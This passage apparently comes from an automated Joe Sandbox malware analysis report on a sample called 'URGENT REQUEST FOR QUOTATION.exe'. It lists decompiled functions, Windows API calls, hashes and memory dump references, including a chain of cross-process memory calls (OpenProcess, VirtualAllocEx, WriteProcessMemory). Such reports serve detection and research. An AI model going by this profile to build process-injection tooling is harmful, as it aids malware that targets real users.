                                                                                                                      • Sleep.KERNEL32 ref: 0009E9F3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2833360925-0
                                                                                                                      • Opcode ID: 055f393a9abbec517a94ce8582e68a2a06fb648bec2c22745b9813252fc543b9
                                                                                                                      • Instruction ID: c2710bfbecb035797f76f9bce006e39e145eef5088fe881c377b2b908f2c9f10
                                                                                                                      • Opcode Fuzzy Hash: 055f393a9abbec517a94ce8582e68a2a06fb648bec2c22745b9813252fc543b9
                                                                                                                      • Instruction Fuzzy Hash: 8A015731C01669DBEF40EBE5DC59AEDBB78FB09700F050956E902B2241CB3899509BA1
                                                                                                                      APIs
                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00091114
                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091120
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 0009112F
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091136
                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0009114D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 842720411-0
                                                                                                                      • Opcode ID: cc945112351372f665fb661deb96386264e48712c829480c3702112bf45a6b67
                                                                                                                      • Instruction ID: 2afe05695e78fd98d3b13492c723fee12919a15d39385e2cb964171c8ecddfbb
                                                                                                                      • Opcode Fuzzy Hash: cc945112351372f665fb661deb96386264e48712c829480c3702112bf45a6b67
                                                                                                                      • Instruction Fuzzy Hash: 4A013C75200205BFEB114FA5DC4DEAA3FAEEF8A3A0B244419FA49D7360DB35DD019B60
                                                                                                                      APIs
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00090FCA
                                                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00090FD6
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00090FE5
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00090FEC
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00091002
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 44706859-0
                                                                                                                      • Opcode ID: 1989f2fbfb3d237e17a80981b64d7d6774081057b9be68582bb429ae3871c614
                                                                                                                      • Instruction ID: 9715cb5ae17d22662098d59513afed6d8777d2b58240e27d2f96fbe790ae82dd
                                                                                                                      • Opcode Fuzzy Hash: 1989f2fbfb3d237e17a80981b64d7d6774081057b9be68582bb429ae3871c614
                                                                                                                      • Instruction Fuzzy Hash: DCF04935200302ABEB214FA5EC49F963BADFF8A762F244414FE49C6251CA75DC50CA60
                                                                                                                      APIs
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0009102A
                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00091036
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00091045
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0009104C
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00091062
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 44706859-0
                                                                                                                      • Opcode ID: d8e76a93a995ae9ee80786b060eb03362b273ecd270780062b3f2aaa6e3cb095
                                                                                                                      • Instruction ID: a9b36616ba3d63a1ab6571c1687a4c181b5b75a3211bad356a382dd964123cb5
                                                                                                                      • Opcode Fuzzy Hash: d8e76a93a995ae9ee80786b060eb03362b273ecd270780062b3f2aaa6e3cb095
                                                                                                                      • Instruction Fuzzy Hash: 1EF06D35200302EBFB215FA5EC49F963BADFF8A7A1F240414FE49C7250CA75D9508A60
                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A0324
                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A0331
                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A033E
                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A034B
                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A0358
                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A0365
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2962429428-0
                                                                                                                      • Opcode ID: a718a9dcb87a0a0d643ac899007d4e6488a35570ed70670730d2789fad512695
                                                                                                                      • Instruction ID: 9a2c29090ea236d730528d1b3bb72ad22ebd10bb307834cd5c0a2f0f84524784
                                                                                                                      • Opcode Fuzzy Hash: a718a9dcb87a0a0d643ac899007d4e6488a35570ed70670730d2789fad512695
                                                                                                                      • Instruction Fuzzy Hash: BE01AE72800B199FCB30AFA6D880812FBF9BF613153158A3FD19652931C3B1AA58DF80
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 0006D752
                                                                                                                        • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                                                                                                        • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                                                                                                      • _free.LIBCMT ref: 0006D764
                                                                                                                      • _free.LIBCMT ref: 0006D776
                                                                                                                      • _free.LIBCMT ref: 0006D788
                                                                                                                      • _free.LIBCMT ref: 0006D79A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: fc035b8bbcd68164667cc1b0fd7b53d4186bc9adff4bbb0fcff08d414e899edb
                                                                                                                      • Instruction ID: 442dbe1b57ebc2cab997533cd15784fe20133d5ad86001c5f15452473495e133
                                                                                                                      • Opcode Fuzzy Hash: fc035b8bbcd68164667cc1b0fd7b53d4186bc9adff4bbb0fcff08d414e899edb
                                                                                                                      • Instruction Fuzzy Hash: A2F03632B48608AB9665EB64FAC6C6A77DFBB44750B940C0AF048D7902DB34FC80D675
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00095C58
                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00095C6F
                                                                                                                      • MessageBeep.USER32(00000000), ref: 00095C87
                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 00095CA3
                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00095CBD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3741023627-0
                                                                                                                      • Opcode ID: d7042b1d29d19a277a90468198e90ed4de5d4b25cd87fc8a1e22e4ec2315a971
                                                                                                                      • Instruction ID: 68b5090b8fcbe92622c99bf0fc511a762244c68b25f6f8037231f53c7d8b98f0
                                                                                                                      • Opcode Fuzzy Hash: d7042b1d29d19a277a90468198e90ed4de5d4b25cd87fc8a1e22e4ec2315a971
                                                                                                                      • Instruction Fuzzy Hash: 9E013170500B04AFFF325B11DE4EFEA77B8BB04B06F041659E687A15E1DBF4A9849B90
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 000622BE
                                                                                                                        • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                                                                                                        • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                                                                                                      • _free.LIBCMT ref: 000622D0
                                                                                                                      • _free.LIBCMT ref: 000622E3
                                                                                                                      • _free.LIBCMT ref: 000622F4
                                                                                                                      • _free.LIBCMT ref: 00062305
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: 57fa046b1e474347aed3bc5983e93df5ce422be48d0c901228576a0027f73e50
                                                                                                                      • Instruction ID: 7da6be415a42971f37a670a793cef530dc7628d51cc55d76547205bb65f483ba
                                                                                                                      • Opcode Fuzzy Hash: 57fa046b1e474347aed3bc5983e93df5ce422be48d0c901228576a0027f73e50
                                                                                                                      • Instruction Fuzzy Hash: F8F05470500915ABD717AF54BC02D5C3BA6F718B91B10050AF450D2A72CBB80891FFF5
                                                                                                                      APIs
                                                                                                                      • EndPath.GDI32(?), ref: 000495D4
                                                                                                                      • StrokeAndFillPath.GDI32(?,?,000871F7,00000000,?,?,?), ref: 000495F0
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00049603
                                                                                                                      • DeleteObject.GDI32 ref: 00049616
                                                                                                                      • StrokePath.GDI32(?), ref: 00049631
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2625713937-0
                                                                                                                      • Opcode ID: e82cc5724931719ea44121ab506209affd4bec5c07b1e74fd6c3697d5fc8daf5
                                                                                                                      • Instruction ID: 4851afddf3048a438f32eab2f3990a28817a2ddf5efb82bbafb328c6ac5764c4
                                                                                                                      • Opcode Fuzzy Hash: e82cc5724931719ea44121ab506209affd4bec5c07b1e74fd6c3697d5fc8daf5
                                                                                                                      • Instruction Fuzzy Hash: 06F03C31005604EBEB265F65ED1CF653BA1BB09326F148224F4A9554F0C7B88991DF24
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __freea$_free
                                                                                                                      • String ID: a/p$am/pm
                                                                                                                      • API String ID: 3432400110-3206640213
                                                                                                                      • Opcode ID: af90be36a4e1ac48e960faba878f62cee57cf8700a25d166e48b8b11e521748e
                                                                                                                      • Instruction ID: 0ace4c10c96b955b1b28b32b678f39c26b859a506bcd21b53c986151386ba351
                                                                                                                      • Opcode Fuzzy Hash: af90be36a4e1ac48e960faba878f62cee57cf8700a25d166e48b8b11e521748e
                                                                                                                      • Instruction Fuzzy Hash: 8FD10071900216DADB689F68C855BFEB7F3EF06300F2C4119E906ABB91D3759E81CB91
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00050242: EnterCriticalSection.KERNEL32(0010070C,00101884,?,?,0004198B,00102518,?,?,?,000312F9,00000000), ref: 0005024D
                                                                                                                        • Part of subcall function 00050242: LeaveCriticalSection.KERNEL32(0010070C,?,0004198B,00102518,?,?,?,000312F9,00000000), ref: 0005028A
                                                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                                                        • Part of subcall function 000500A3: __onexit.LIBCMT ref: 000500A9
                                                                                                                      • __Init_thread_footer.LIBCMT ref: 000B7BFB
                                                                                                                        • Part of subcall function 000501F8: EnterCriticalSection.KERNEL32(0010070C,?,?,00048747,00102514), ref: 00050202
                                                                                                                        • Part of subcall function 000501F8: LeaveCriticalSection.KERNEL32(0010070C,?,00048747,00102514), ref: 00050235
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                      • String ID: 5$G$Variable must be of type 'Object'.
                                                                                                                      • API String ID: 535116098-3733170431
                                                                                                                      • Opcode ID: c89eff242a82dfdde8feff0f2095b4e254a8a49f689ad59f1871b277b2d4cbe3
                                                                                                                      • Instruction ID: e64870ae6b3bf2ca43812df4ef96a333d66422d7c23ce38967bc1f5ab3d41669
                                                                                                                      • Opcode Fuzzy Hash: c89eff242a82dfdde8feff0f2095b4e254a8a49f689ad59f1871b277b2d4cbe3
                                                                                                                      • Instruction Fuzzy Hash: F8917970A04209EFCB14EF94D891DEDBBB5EF89340F10805DF84AAB292DB71AE41CB51
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0009B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000921D0,?,?,00000034,00000800,?,00000034), ref: 0009B42D
                                                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00092760
                                                                                                                        • Part of subcall function 0009B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000921FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0009B3F8
                                                                                                                        • Part of subcall function 0009B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0009B355
                                                                                                                        • Part of subcall function 0009B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00092194,00000034,?,?,00001004,00000000,00000000), ref: 0009B365
                                                                                                                        • Part of subcall function 0009B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00092194,00000034,?,?,00001004,00000000,00000000), ref: 0009B37B
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000927CD
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0009281A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 4150878124-2766056989
                                                                                                                      • Opcode ID: a6cfc29172ba3719999d954735383a97a5f7ace10cd3aa0fc657e03f25553056
                                                                                                                      • Instruction ID: 66e4c8ac7fe0f92fb92e684bbb5319a726bc959b28b18c39a5c0319456f9602c
                                                                                                                      • Opcode Fuzzy Hash: a6cfc29172ba3719999d954735383a97a5f7ace10cd3aa0fc657e03f25553056
                                                                                                                      • Instruction Fuzzy Hash: 4E411972900218BFDF10DBA4DD85EEEBBB8AF09710F108099FA55B7181DB706E45DBA1
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe,00000104), ref: 00061769
                                                                                                                      • _free.LIBCMT ref: 00061834
                                                                                                                      • _free.LIBCMT ref: 0006183E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                      • String ID: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe
                                                                                                                      • API String ID: 2506810119-2317327161
                                                                                                                      • Opcode ID: 42d5f333dc30ca2aa84072996ce9ff7b011d4dbf9467c139a040e01308ed1ac2
                                                                                                                      • Instruction ID: d759e7e0547068a1131b687cf17ee0cdf1a88bf9dede768b0f7a192b5721148e
                                                                                                                      • Opcode Fuzzy Hash: 42d5f333dc30ca2aa84072996ce9ff7b011d4dbf9467c139a040e01308ed1ac2
                                                                                                                      • Instruction Fuzzy Hash: D8316275A04218BFDB21DF99D885DDEBBFEEB85310F184166F805D7212DAB04E40CB90
                                                                                                                      APIs
                                                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0009C306
                                                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 0009C34C
                                                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00101990,018B5390), ref: 0009C395
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Delete$InfoItem
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 135850232-4108050209
                                                                                                                      • Opcode ID: f30fb79b36475234f4daf2414d7bd518b4f206366ec1bda18e595c1f29a54caf
                                                                                                                      • Instruction ID: e20c252a32469c43d68941a988db35a89456ce01c041f6417ae8c451ee044e54
                                                                                                                      • Opcode Fuzzy Hash: f30fb79b36475234f4daf2414d7bd518b4f206366ec1bda18e595c1f29a54caf
